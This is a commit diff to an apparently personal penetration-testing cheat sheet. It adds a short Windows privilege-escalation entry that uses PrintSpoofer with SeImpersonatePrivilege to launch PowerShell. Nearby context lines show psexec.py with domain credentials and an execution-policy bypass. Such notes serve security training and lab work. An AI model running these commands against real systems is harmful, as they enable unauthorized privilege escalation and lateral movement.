Update Cheat Sheet.md

This commit is contained in:
ARZ 2021-03-17 20:37:55 +05:00 committed by GitHub
parent d01089cefd
commit 35d86dc3e4
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -243,6 +243,11 @@ dir /a:h `show only hidden files`<br/>
### Psexec.py
` python psexec.py DOMAIN/USER:PASS@IP`
### Privlege Escalation using SeImpersonatePrivilege
If this is enabled we can upload `Printspoofer.exe ` and place it if we have rights
`PrintSpoofer.exe -i -c powershell.exe`
### Active Directory
`powershell -ep bypass` load a powershell shell with execution policy bypassed <br/>